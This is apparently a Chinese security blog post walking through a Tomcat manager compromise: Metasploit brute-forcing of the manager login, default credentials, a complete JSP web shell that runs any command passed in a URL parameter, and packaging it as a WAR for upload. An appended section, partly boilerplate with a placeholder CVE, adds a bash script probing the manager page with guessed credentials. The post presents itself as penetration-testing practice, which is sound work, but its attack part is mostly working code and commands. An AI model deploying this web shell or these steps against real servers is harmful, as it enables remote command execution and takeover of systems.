Tomcat弱口令+war部署getshell

影响版本

全版本

漏洞复现

msf爆破

use auxiliary/scanner/http/tomcat_mgr_login

设置IP和端口

set rhosts 10.7.10.41
set rport 8080(默认端口)

run运行
在这里插入图片描述

tomcat:tomcat

在这里插入图片描述
登陆成功
在这里插入图片描述
用大佬的jsp一句话马
在这里插入图片描述

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

然后把shell.jsp压缩成zip然后改后缀为1.war上传
在这里插入图片描述
访问地址:http://xxxxxx:8080/1/shell.jsp
传参pwd和i

?pwd=123&i=ls(执行命令)

在这里插入图片描述
QQ:3075999532

参考文章:
https://www.cnblogs.com/mke2fs/p/12718669.html
https://www.cnblogs.com/qianxinggz/p/13440366.html

### 关于VulnHub上的Tomcat渗透测试教程与漏洞利用 #### 背景介绍 VulnHub是个提供虚拟机镜像的平台,用于安全研究人员和爱好者练习渗透测试技能。其中许多靶机都涉及Web应用的安全问题,而Apache Tomcat作为款流行的Java Servlet容器,在这些环境中经常被用作目标服务之。 在提到的具体案例中,Breach-1.0 和 My Tomcat Host 都包含了针对Tomcat服务器的相关攻击向量[^1][^2]。通过分析已有的实验记录可以发现几个常见的切入点: 1. **弱口令或默认配置** 很多情况下,默认安装的Tomcat实例会保留管理员账户(如`admin/admin`)或者未更改其他敏感设置。这使得攻击者能够轻松获取管理权限并部署恶意WAR文件[^3]。 2. **目录遍历/路径穿越漏洞** 如果存在错误编码逻辑,则可能允许远程用户访问受限资源甚至操作系统层面的数据存储位置[^1]。 3. **反序列化缺陷** Java应用程序特别容易受到此类威胁的影响,尤其是当它们依赖第三方库处理输入数据流时。例如Commons Collections组件就曾暴露出严重风险[CVE编号待补充],该问题可导致任意代码执行情况发生。 4. **JSP上传功能滥用** 当网站提供了文件上传接口却缺乏足够的验证机制来阻止非法扩展名提交的话,那么就可以尝试构造特制请求从而实现GetShell的目的. 以下是基于上述理论的个简单示例脚本用来演示如何自动化查找潜在易受攻击的服务端点: ```bash #!/bin/bash TARGET=$1 PORT=${2:-8080} if [[ -z "$TARGET" ]]; then echo "[!] Usage: $0 <target> [port]" exit 1 fi echo "[*] Checking target at http://${TARGET}:${PORT}/manager/html ..." curl --silent --insecure \ --user admin:password \ "http://${TARGET}:${PORT}/manager/html/list" | grep 'OK' && { echo "[+] Manager interface accessible!" } || { echo "[-] Unable to access manager page." } ``` 此脚本仅作为个基础框架展示目的,并不包含完整的业务逻辑判断以及防护措施规避等内容,请勿直接应用于实际环境当中! --- ### 实践建议 对于初学者而言,可以从以下几个方面入手学习: - 掌握基本Linux命令行操作技巧; - 学习Python/Bash等编程语言编写简单的工具辅助完成任务; - 熟悉Metasploit Framework及其插件生态系统; - 参考OWASP Top Ten了解当前主流web安全隐患分类标准; 最后提醒大家注意合法合规地开展研究活动,避免触犯法律法规造成不必要的麻烦。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值